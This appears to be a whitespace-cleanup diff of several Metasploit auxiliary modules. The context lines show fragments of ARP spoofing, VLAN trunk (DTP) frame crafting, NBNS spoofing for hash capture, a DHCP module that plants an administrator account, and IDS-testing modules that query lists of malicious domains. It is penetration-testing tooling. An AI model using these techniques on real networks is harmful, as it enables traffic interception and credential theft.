@ -156,7 +156,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
c.put "500 Access denied\r\n"
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
upath = ::File.expand_path(datastore['FTPROOT'])
|
||||
npath = ::File.expand_path(::File.join(datastore['FTPROOT'], @state[c][:cwd], arg))
|
||||
bpath = npath[upath.length, npath.length - upath.length]
|
||||
|
|
|
@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
partition seen. The windows user will have the password p@SSw0rd!123456
|
||||
(in case of complexity requirements) and will be added to the administrators
|
||||
group.
|
||||
|
||||
|
||||
Note: the displayed IP address of a target is the address this DHCP server
|
||||
handed out, not the "normal" IP address the host uses.
|
||||
},
|
||||
|
|
|
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
else
|
||||
shosts_range.each{|shost| if is_ipv4? shost then @shosts.push shost end}
|
||||
end
|
||||
|
||||
|
||||
if datastore['BROADCAST']
|
||||
broadcast_spoof
|
||||
else
|
||||
|
@ -116,7 +116,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
if capture and @spoofing and not datastore['BROADCAST']
|
||||
print_status("RE-ARPing the victims...")
|
||||
3.times do
|
||||
3.times do
|
||||
@dsthosts_cache.keys.sort.each do |dhost|
|
||||
dmac = @dsthosts_cache[dhost]
|
||||
if datastore['BIDIRECTIONAL']
|
||||
|
@ -197,7 +197,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
@dsthosts_cache[reply.arp_saddr_ip] = reply.arp_saddr_mac
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
#Wait some few seconds for last packets
|
||||
etime = Time.now.to_f + datastore['TIMEOUT']
|
||||
|
@ -221,7 +221,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if @dsthosts_cache.has_key? shost
|
||||
if datastore['VERBOSE']
|
||||
print_status("Adding #{shost} from destination cache")
|
||||
end
|
||||
end
|
||||
@srchosts_cache[shost] = @dsthosts_cache[shost]
|
||||
next
|
||||
end
|
||||
|
@ -269,7 +269,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
@spoofing = true
|
||||
while(true)
|
||||
if datastore['AUTO_ADD']
|
||||
@mutex_cache.lock
|
||||
@mutex_cache.lock
|
||||
if @dsthosts_autoadd_cache.length > 0
|
||||
@dsthosts_cache.merge!(@dsthosts_autoadd_cache)
|
||||
@dsthosts_autoadd_cache = {}
|
||||
|
@ -366,7 +366,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
return unless pkt.arp_opcode == 2
|
||||
pkt
|
||||
end
|
||||
|
||||
|
||||
def start_listener(dsthosts_cache, srchosts_cache)
|
||||
|
||||
if datastore['BIDIRECTIONAL']
|
||||
|
@ -386,8 +386,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
else
|
||||
args[:shosts].each {|address| liste_src_ips.push address}
|
||||
end
|
||||
liste_dst_ips = []
|
||||
args[:dhosts].each_key {|address| liste_dst_ips.push address}
|
||||
liste_dst_ips = []
|
||||
args[:dhosts].each_key {|address| liste_dst_ips.push address}
|
||||
localip = args[:localip]
|
||||
|
||||
listener_capture = ::Pcap.open_live(@interface, 68, true, 0)
|
||||
|
@ -419,7 +419,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
@srchosts_autoadd_cache[pkt.arp_saddr_ip] = pkt.arp_saddr_mac
|
||||
liste_src_ips.push pkt.arp_saddr_ip
|
||||
@mutex_cache.unlock
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
], self.class)
|
||||
deregister_options('RHOST', 'PCAPFILE')
|
||||
end
|
||||
|
||||
|
||||
def build_dtp_frame
|
||||
p = PacketFu::EthPacket.new
|
||||
p.eth_daddr = '01:00:0c:cc:cc:cc'
|
||||
|
@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
p.payload = llc_hdr << dtp_hdr
|
||||
p
|
||||
end
|
||||
|
||||
|
||||
def is_mac?(mac)
|
||||
!!(mac =~ /^([a-fA-F0-9]{2}:){5}[a-fA-F0-9]{2}$/)
|
||||
end
|
||||
|
@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
return @spoof_mac
|
||||
end
|
||||
|
||||
def run
|
||||
def run
|
||||
unless smac()
|
||||
print_error 'Source MAC (SMAC) should be defined'
|
||||
else
|
||||
|
|
|
@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
machine to an IP of the attacker's choosing. Combined with auxiliary/capture/server/smb or
|
||||
capture/server/http_ntlm it is a highly effective means of collecting crackable hashes on
|
||||
common networks.
|
||||
|
||||
|
||||
This module must be run as root and will bind to tcp/137 on all interfaces.
|
||||
},
|
||||
'Author' => [ 'Tim Medin <tim@securitywhole.com>' ],
|
||||
|
|
|
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
deregister_options('SNAPLEN','FILTER','PCAPFILE','RHOST','TIMEOUT','UDP_SECRET','GATEWAY','NETMASK')
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
check_pcaprub_loaded # Check first
|
||||
pkt_delay = datastore['PKT_DELAY']
|
||||
|
|
|
@ -60,7 +60,7 @@ COMMIT;
|
|||
RETURN NULL;
|
||||
END;
|
||||
"
|
||||
|
||||
|
||||
#PROCEDURE CREATE_CHANGE_SET
|
||||
# Argument Name Type In/Out Default?
|
||||
# ------------------------------ ----------------------- ------ --------
|
||||
|
|
|
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def run
|
||||
@res = Net::DNS::Resolver.new()
|
||||
|
||||
|
||||
domain = [
|
||||
"lalundelau.sinip.es","bf2back.sinip.es","thejacksonfive.mobi",
|
||||
"thejacksonfive.us","thejacksonfive.biz","butterfly.BigMoney.biz",
|
||||
|
@ -49,15 +49,15 @@ class Metasploit3 < Msf::Auxiliary
|
|||
"tamiflux.net","binaryfeed.in","youare.sexidude.com",
|
||||
"mierda.notengodominio.com",
|
||||
]
|
||||
|
||||
|
||||
if datastore['DNS_SERVER']
|
||||
@res.nameservers = datastore['DNS_SERVER']
|
||||
end
|
||||
|
||||
|
||||
count = 0
|
||||
|
||||
|
||||
while count < datastore['COUNT']
|
||||
|
||||
|
||||
domain.each do |name|
|
||||
query = @res.query(name, "A")
|
||||
time = Time.new
|
||||
|
|
|
@ -38,11 +38,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if datastore['DNS_SERVER']
|
||||
@res.nameservers = datastore['DNS_SERVER']
|
||||
end
|
||||
|
||||
|
||||
count = 0
|
||||
|
||||
|
||||
while count < datastore['COUNT']
|
||||
|
||||
|
||||
domain = datastore['DOMAINS'].split(/[\s,]+/)
|
||||
domain.each do |name|
|
||||
query = @res.query(name, "A")
|
||||
|
|
|
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def run
|
||||
@res = Net::DNS::Resolver.new()
|
||||
|
||||
|
||||
domain = [
|
||||
"allspring.net","antifoher.biz","asdfasdgqghgsw.cx.cc",
|
||||
"ashnmjjpoljfnl.info","atlaz.net","b3l.org","back.boroborogold.ru",
|
||||
|
@ -54,15 +54,15 @@ class Metasploit3 < Msf::Auxiliary
|
|||
"favoritopilodjd.com","favqnornkwvkwfxv.biz","fdhjkfhskas.com",
|
||||
"federalreserve-report.com","federetoktyt.net"
|
||||
]
|
||||
|
||||
|
||||
if datastore['DNS_SERVER']
|
||||
@res.nameservers = datastore['DNS_SERVER']
|
||||
end
|
||||
|
||||
|
||||
count = 0
|
||||
|
||||
|
||||
while count < datastore['COUNT']
|
||||
|
||||
|
||||
domain.each do |name|
|
||||
query = @res.query(name, "A")
|
||||
time = Time.new
|
||||
|
|
|
@ -12,13 +12,13 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
#
|
||||
# This module acts as an compromised webserver distributing PII Data
|
||||
#
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Auxiliary::PII
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'VSploit Web PII',
|
||||
|
|
Loading…
Reference in New Issue